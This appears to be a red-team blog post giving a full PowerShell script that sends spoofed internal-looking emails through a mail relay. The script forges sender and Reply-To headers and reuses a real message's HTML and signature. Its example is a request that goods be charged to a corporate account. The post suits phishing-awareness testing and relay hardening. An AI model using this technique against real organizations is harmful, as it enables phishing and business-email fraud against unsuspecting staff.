Introduction

If you’re like me, you’ll recall the days of using telnet to connect to an SMTP Server on port 25 and issue the basic SMTP commands 1 (e.g. EHLO, MAIL FROM:, RCPT TO:, DATA). While I won’t miss accidentally mistyping a command, I will miss the simplicity. However, with the simplicity also came limitations, such as creating a realistic email that looks identical to an internal email communication. In comes PowerShell, and this is not new or groundbreaking, to make things both easy and realistic. In this post, I’ll pull together everything I’ve learned and demonstrate how to use PowerShell to turn a mail relay into a Blue Team’s nightmare or a Red Team’s best friend.

Please note - config and script below is fictitious and will not work if you try to run the below PowerShell as-is. Additionally, ThickMints.dev has no association with Girl Scouts. Do not attempt this on systems that you don’t own or have explicit permission.

Setup

The setup is simple, you’ll need 3 (or 4 for some extra flare) things to make this successful.

  1. Mail Relay (doesn’t have to be open)
  2. A sample e-mail that you want to copy
  3. PowerShell
  4. Bonus Item: Corporate Logo or similar graphic to embed in the email

In addition, you’ll need minimal experience reading and editing HTML and PowerShell.

Making It All Happen

Mail Relay

The first thing you need is a Mail Relay server. The PowerShell provided in this post will provide a means to authenticate, so if you are unable to find an Open Mail Relay on the network, this won’t be a problem. There are many ways to find a Mail Relay server, for example you may find scripts that contain UN/PW combinations for a mail relay when performing reconnaissance on a network or scan a network for an open TCP port 25 (you could even add TCP ports 465 and 587).

Sample E-mail

This is the most important part of making a realistic spoofed message. Acquire a copy of the e-mail that you want to mimic and view the raw message HTML. There are many ways to do view the HTML, but a quick web search brought me here: View Original Message HTML and accounts for various scenarios. You will need this raw HTML for the PowerShell script.

PowerShell Script

Disclaimer: The provided PowerShell script is basic but gets the job done
I have broken my PowerShell script into four main sections.

Section 1 - Variables

The first section is for multiple variables that make tweaking and changing messages quick and easy. These variables will be for the contents of the message itself, and will be used in the E-mail Message section. In addition, you can have the “reply” e-mail address different than the “from” e-mail address.

$MailFrom = "Thin Mints <ThinMints@thickmints.dev>"
$MailTo = "CarmelDeLites@thickmints.dev"
$MailCC = "Lemonades@thickmints.dev,Smores@thickmints.dev,"
$ReplyTo = "$MailTo" #Or set the reply to an email box you control
$ReturnPath = "$MailTo"
$MessageSubject = "Please Send a Crate of Girl Scout Cookies ASAP"
$MessageBody = "Carmel, please make sure to send a crate of Girl Scout cookies to the crew over at ThickMints.dev. Put it on the corporate account. Thanks."
$MessageSignature = "Thin"
$MessageName = "Thin Mints"
$MessageTitle = "Chief Cookie Officer"
$MessageAddress = "123 Cookie Way, Sugar City, NY 12345" 
$MessagePhone = "555-867-5309"
$MessageEmail = "ThinMints@thickmints.dev"
$MessageSensitivity = "Confidential"

Section 2 - SMTP Server Config

This section establishes all the SMTP Server config. If you require a UN/PW for the Mail Relay, include the first 3 lines. If you’ve found an open mail relay, you can ignore them.

$Username = "anonymous"
$Secret = ConvertTo-SecureString -String "password" -AsPlainText -Force
$Creds = New-Object System.Management.Automation.PSCredential($Username,$Secret)
$SmtpServer = "mail.thickmints.dev"
$SmtpPort = "25"

Section 3 - E-mail Message

Here’s where it gets fun. This section builds the e-mail message that will be sent. Take the raw message HTML from your sample e-mail and put it in the $Message.Body variable. If you have images that you’d like to include, they will be attached here. When attaching items, please ensure that the user context in which you are executing the PowerShell from has access to that path.

$Message = New-Object System.Net.Mail.MailMessage $MailFrom,$MailTo
# Optional: Here's where to attach images 
$Message.Attachments.Add("C:\Temp\MailSpoof\CompanyLogo.png")
$Message.Attachments.Add("C:\Temp\MailSpoof\Award1.png")
$Message.Attachments.Add("C:\Temp\MailSpoof\Award2.jpg")
$Message.Attachments.Add("C:\Temp\MailSpoof\Award3.png")
$Message.Attachments.Add("C:\Temp\MailSpoof\Award4.jpg")
$Message.Headers.Add("Return-Path",$ReturnPath)
$Message.CC.Add($MailCC)
$Message.ReplyTo=$ReplyTo
$Message.IsBodyHTML = $true
$Message.Subject = $MessageSubject
$Message.Body = @"
<html>
RAW HTML HERE
</html>
"@

Section 4 - Sending Message

Finally, we need to have PowerShell send the message that we just crafted. If your Mail Relay requires TLS/SSL and Credentials, you’ll see a couple lines to account for that. Remember, if using credentials, set the UN/PW in the SMTP Server Config section,

$Smtp = New-Object Net.Mail.SmtpClient($SmtpServer,$SmtpPort)
$Smtp.EnableSsl = $true
$Smtp.Credentials = $creds
$Smtp.Send($Message)

Putting It All Together

Now an example PowerShell that brings everything together. The raw HTML came from a message generated with Microsoft Outlook with a signature block that may mimic a corporate environment.

# SECTION 1 - VARIABLES
$MailFrom = "Thin Mints <ThinMints@thickmints.dev>"
$MailTo = "CarmelDeLites@thickmints.dev"
$MailCC = "Lemonades@thickmints.dev,Smores@thickmints.dev,"
$ReplyTo = "$MailTo" #Or set the reply to an email box you control
$ReturnPath = "$MailTo"
$MessageSubject = "Please Send a Crate of Girl Scout Cookies ASAP"
$MessageBody = "Carmel, please make sure to send a crate of Girl Scout cookies to the crew over at ThickMints.dev.Put it on the corporate account. Thanks."
$MessageSignature = "Thin"
$MessageName = "Thin Mints"
$MessageTitle = "Chief Cookie Officer"
$MessageAddress = "123 Cookie Way, Sugar City, NY 12345" 
$MessagePhone = "555-867-5309"
$MessageEmail = "ThinMints@thickmints.dev"
$MessageSensitivity = "Confidential"

# SECTION 2 - SMTP SERVER CONFIG
$Username = "user"
$Secret = ConvertTo-SecureString -String "password" -AsPlainText -Force
$Creds = New-Object System.Management.Automation.PSCredential($Username,$Secret)
$SmtpServer = "mail.thickmints.dev"
$SmtpPort = "25"

# SECTION 3 - BUILD E-MAIL MESSAGE
$Message = New-Object System.Net.Mail.MailMessage $MailFrom,$MailTo
# Optional: Here's where to attach images 
$Message.Attachments.Add("C:\Temp\MailSpoof\CompanyLogo.png")
$Message.Attachments.Add("C:\Temp\MailSpoof\Award1.png")
$Message.Attachments.Add("C:\Temp\MailSpoof\Award2.jpg")
$Message.Attachments.Add("C:\Temp\MailSpoof\Award3.png")
$Message.Attachments.Add("C:\Temp\MailSpoof\Award4.jpg")
$Message.Headers.Add("Return-Path",$ReturnPath)
$Message.CC.Add($MailCC)
$Message.ReplyTo=$ReplyTo
$Message.IsBodyHTML = $true
$Message.Subject = $MessageSubject
$Message.Body = @"
<html xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:w="urn:schemas-microsoft-com:office:word" xmlns:m="http://schemas.microsoft.com/office/2004/12/omml" xmlns="http://www.w3.org/TR/REC-html40">
  <head>
    <meta http-equiv=Content-Type content="text/html; charset=us-ascii">
    <meta name=Generator content="Microsoft Word 15 (filtered medium)">
    <!--[if !mso]>
				<style>v\:* {behavior:url(#default#VML);}
o\:* {behavior:url(#default#VML);}
w\:* {behavior:url(#default#VML);}
.shape {behavior:url(#default#VML);}
</style>
				<![endif]-->
    <style>
      <!--
      /* Font Definitions */
      @font-face {
        font-family: "Cambria Math";
        panose-1: 2 4 5 3 5 4 6 3 2 4;
      }

      @font-face {
        font-family: Calibri;
        panose-1: 2 15 5 2 2 2 4 3 2 4;
      }

      /* Style Definitions */
      p.MsoNormal,
      li.MsoNormal,
      div.MsoNormal {
        margin: 0in;
        font-size: 11.0pt;
        font-family: "Calibri", sans-serif;
      }

      a:link,
      span.MsoHyperlink {
        mso-style-priority: 99;
        color: #0563C1;
        text-decoration: underline;
      }

      span.EmailStyle17 {
        mso-style-type: personal-compose;
        font-family: "Calibri", sans-serif;
        color: windowtext;
      }

      .MsoChpDefault {
        mso-style-type: export-only;
        font-family: "Calibri", sans-serif;
      }

      @page WordSection1 {
        size: 8.5in 11.0in;
        margin: 1.0in 1.0in 1.0in 1.0in;
      }

      div.WordSection1 {
        page: WordSection1;
      }
      -->
    </style>
    <!--[if gte mso 9]>
				<xml>
					<o:shapedefaults v:ext="edit" spidmax="1026" />
				</xml>
				<![endif]-->
    <!--[if gte mso 9]>
				<xml>
					<o:shapelayout v:ext="edit">
						<o:idmap v:ext="edit" data="1" />
					</o:shapelayout>
				</xml>
				<![endif]-->
  </head>
  <body lang=EN-US link="#0563C1" vlink="#954F72" style='word-wrap:break-word'>
    <p class=msipheader3e56b697 align="Right" style="margin:0">
	    <span style='font-size:10.0pt;font-family:Calibri;color:#000000'>$MessageSensitivity</span>
	</p>
	<br />
    <div class=WordSection1>
      <p class=MsoNormal>$MessageBody<o:p></o:p>
      </p>
      <p class=MsoNormal>
        <o:p>&nbsp;</o:p>
      </p>
      <p class=MsoNormal>$MessageSignature <o:p></o:p>
      </p>
      <p class=MsoNormal>
        <o:p>&nbsp;</o:p>
      </p>
      <p class=MsoNormal>-- <o:p></o:p>
      </p>
      <p class=MsoNormal>
        <o:p>&nbsp;</o:p>
      </p>
      <p class=MsoNormal>
        <b>
          <span style='font-size:12.0pt;color:#3EB489;mso-fareast-language:JA'>$MessageName<o:p></o:p>
          </span>
        </b>
      </p>
      <p class=MsoNormal>
        <span style='color:#333333;mso-fareast-language:JA'>$MessageTitle<o:p></o:p>
        </span>
      </p>
      <!-- *****PLEASE NOTE - IMAGES MUST MATCH THE IMAGE FILENAME*****  -->
      <p class=MsoNormal>
        <span style='color:#333333;mso-fareast-language:JA'>
          <img width=157 height=98 style='width:1.6354in;height:1.0208in' id="Picture_x0020_6" src="cid:CompanyLogo.png">
          <o:p></o:p>
        </span>
      </p>
      <p class=MsoNormal>
        <span style='color:#333333;mso-fareast-language:JA'>$MessageAddress<o:p></o:p>
        </span>
      </p>
      <p class=MsoNormal>
        <span style='color:#333333;mso-fareast-language:JA'>Mobile: $MessagePhone<o:p></o:p>
        </span>
      </p>
      <p class=MsoNormal>
        <span style='color:#333333;mso-fareast-language:JA'>
          <a href="mailto:$MessageEmail">$MessageEmail</a> | <a href="https://blog.thickmints.dev/">blog.thickmints.dev</a>
          <o:p></o:p>
        </span>
      </p>
      <p class=MsoNormal>
        <span style='color:#333333;mso-fareast-language:JA'>
          <o:p>&nbsp;</o:p>
        </span>
      </p>
      <!-- *****PLEASE NOTE - IMAGES MUST MATCH THE IMAGE FILENAMES*****  -->
      <p class=MsoNormal>
        <span style='color:#333333;mso-fareast-language:JA'>
          <img border=0 width=132 height=129 style='width:1.375in;height:1.3437in' id="Picture_x0020_8" src="cid:Award1.png" alt="Girl Scout Badge 1">&nbsp; <img border=0 width=132 height=129 style='width:1.375in;height:1.3437in' id="Picture_x0020_7" src="cid:Award2.jpg" alt="Girl Scout Badge 2">&nbsp;&nbsp; <img border=0 width=132 height=129 style='width:1.375in;height:1.3437in' id="Picture_x0020_9" src="cid:Award3.jpg" alt="Girl Scout Badge 3">&nbsp;&nbsp; <img border=0 width=132 height=129 style='width:1.375in;height:1.3437in' id="Picture_x0020_10" src="cid:Award4.jpg" alt="Girl Scout Badge 4">
          <o:p></o:p>
        </span>
      </p>
      <p class=MsoNormal>
        <span style='color:#333333;mso-fareast-language:JA'>Images and names are all copyrights of Girl Scouts of the United States of America. <o:p></o:p>
        </span>
      </p>
      <p class=MsoNormal>
        <span style='color:#333333;mso-fareast-language:JA'>&copy; 2016-2021 Girl Scouts of the United States of America. <o:p></o:p>
        </span>
      </p>
    </div>
  </body>
</html>
"@

# SECTION 4 - SENDING MESSAGE
$Smtp = New-Object Net.Mail.SmtpClient($SmtpServer,$SmtpPort)
$Smtp.EnableSsl = $true
$Smtp.Credentials = $creds
$Smtp.Send($Message)

image

Summary

Using this technique, you will be able to spoof e-mail messages that look identical to real internal communications. From a Red Team perspective, you can increase the efficacy of your internal phishing campaigns. On the flip side, I hope this stresses the importance of securing your Mail Relay servers to avoid falling victim to this attack. PowerShell is widely available on most corporate networks, and the barrier to entry for performing these actions are low. Stay minty.


  1. RFC 2821 - Simple Mail Transfer Protocol ↩︎